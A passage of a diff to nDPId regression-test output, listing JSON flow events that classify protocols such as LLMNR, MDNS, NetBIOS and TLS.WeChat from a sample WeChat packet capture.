{"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167669545,"flow_last_seen":1492167848542,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795088,"flow_last_seen":1492167795100,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167449288,"flow_last_seen":1492167820408,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1492167440984,"flow_last_seen":1492167822531,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167440370,"flow_last_seen":1492167815567,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795087,"flow_last_seen":1492167795096,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167669545,"flow_last_seen":1492167848542,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Tencent","breed":"Acceptable","category":"SocialNetwork"}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788126,"flow_last_seen":1492167911210,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"}} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167849769,"flow_last_seen":1492167851204,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1492167788128,"flow_last_seen":1492167911211,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1492167788126,"flow_last_seen":1492167911210,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167849769,"flow_last_seen":1492167851204,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795090,"flow_last_seen":1492167795099,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1492167788128,"flow_last_seen":1492167911211,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795091,"flow_last_seen":1492167795098,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 